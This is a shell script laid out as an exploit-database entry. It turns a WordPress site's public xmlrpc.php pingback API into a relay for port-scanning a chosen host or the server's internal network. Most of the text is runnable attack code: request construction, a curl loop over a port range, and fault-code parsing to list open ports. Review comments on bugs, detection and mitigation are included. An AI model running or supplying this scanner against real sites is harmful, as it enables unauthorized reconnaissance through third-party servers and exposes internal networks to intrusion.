#!/bin/sh
#
# Exploit Title: WordPress xmlrpc.php pingback portscanner
# Date: 12/05/2013
# Exploit Author: pimperato
# Vendor Homepage: http://wordpress.com/
# Version: v 3.5 enables the xmlrpc.php interface by default
#
# Description="[...] The Pingback API is publicly available by default
# in WordPress 3.5 and doesn't require any authentication. By using
# this API, we can essentially use a default WordPress 3.5 installation
# to perform port scanning for us. Not only can we relay scans through
# the website, but we can attempt to scan the web server itself (127.0.0.1)
# or even the INTERNAL NETWORK the server is part of [...]"
# Reference: http://www.pentestgeek.com/2013/01/03/wordpress-pingback-portscanner-metasploit-module/
# Flat script, no functions. Arguments (all four required):
#   $1 - xmlrpc.php endpoint of the WordPress instance used as the relay
#   $2 - host the relay is asked to connect to (becomes the pingback sourceURI)
#   $3 - port range as "start-stop"
#   $4 - URL of an existing post on the relay (becomes the pingback targetURI)
# Exits 1 on missing arguments or an invalid range; otherwise prints one
# "$2:$port" line per port the relay reports as reachable.
# NOTE(review): `-o` inside `[ ]` is deprecated/ambiguous; `[[ ]]` with `||`
# would be safer, but `[[` is not available under #!/bin/sh.
if [ "$1" = "" -o "$2" = "" -o "$3" = "" -o "$4" = "" ]
then
echo "usage: $0 <http://wordpress_blog/xmlrpc.php> <http://target> <range_ports> <http://wordpress_blog/path_to_existing_post>"
echo "ex. : $0 http://wordpress_blog.example.com/xmlrpc.php http://target.example.com 0-65535 http://wordpress_blog.example.com/existing_post/"
exit 1
fi
# Split "start-stop" on the first "-". $3 is unquoted here, so a value
# containing whitespace or glob characters is word-split/globbed before awk
# sees it. If $3 has no "-", port_stop is empty and the numeric test below
# fails with a shell error rather than the "port range not correct" message.
port_start=$(echo $3 | awk -F"-" '{print $1}')
port_stop=$(echo $3 | awk -F"-" '{print $2}')
# Numeric sanity check only; non-numeric input makes `[` itself error out.
if [ "$port_start" -gt "$port_stop" -o "$port_start" -lt 0 -o "$port_stop" -gt 65535 ]
then
echo "port range not correct"
exit 1
fi
# The relay answers pingback.ping with an XML-RPC <int> fault code. The
# mapping below is the author's interpretation of those codes as seen from
# the relay: the integer encodes whether the relay could fetch the sourceURI
# (i.e. open a TCP connection to $2:$port) and whether the fetched page
# linked back to $4. Only 17 and 32 are consulted by the loop; 16 and 33 are
# declared but never used.
searchstring16="<int>16</int>" #port closed
searchstring17="<int>17</int>" #port open
searchstring32="<int>32</int>" #port open, but the title can't be found
searchstring33="<int>33</int>" #not a valid post
echo "*** portscan started ***"
# NOTE(review): `seq` is not POSIX and backticks are harder to nest than
# $( ); under #!/bin/sh a `while` counter would be the portable form.
for port in `seq $port_start $port_stop`
do
# One pingback.ping request per port: sourceURI = "$2:$port", targetURI = $4.
# Neither $2 nor $4 is escaped, so XML metacharacters in them break the
# request body. From the relay's point of view every probe is an outbound
# HTTP fetch of sourceURI; from the web server's access log it is one POST
# to xmlrpc.php per second from the same client.
xml="<?xml version=\"1.0\" encoding=\"iso-8859-1\"?><methodCall><methodName>pingback.ping</methodName><params><param><value><string>$2:$port</string></value></param><param><value><string>$4</string></value></param></params></methodCall>"
# -s hides curl's progress/errors; a failed request leaves $res empty and the
# port is silently treated as not reachable (no distinction from a fault).
res=$(curl -s --data "$xml" "$1")
# Report the port when the fault code is 17 or 32 (see the mapping above).
# $2 is unquoted in the echo lines, so it is subject to word splitting.
if echo "$res" | grep -q "$searchstring17"
then
echo $2:$port
else
if echo "$res" | grep -q "$searchstring32"
then
echo $2:$port
fi
fi
# Fixed 1 s pacing between probes; this cadence is a usable detection signal
# in the relay's logs. Mitigation on the relay side is to disable or filter
# pingback.ping on xmlrpc.php and to restrict the web server's egress to
# internal address ranges.
sleep 1
done
echo "*** portscan finished ***"
reference: http://www.pentestgeek.com/2013/01/03/wordpress-pingback-portscanner-metasploit-module/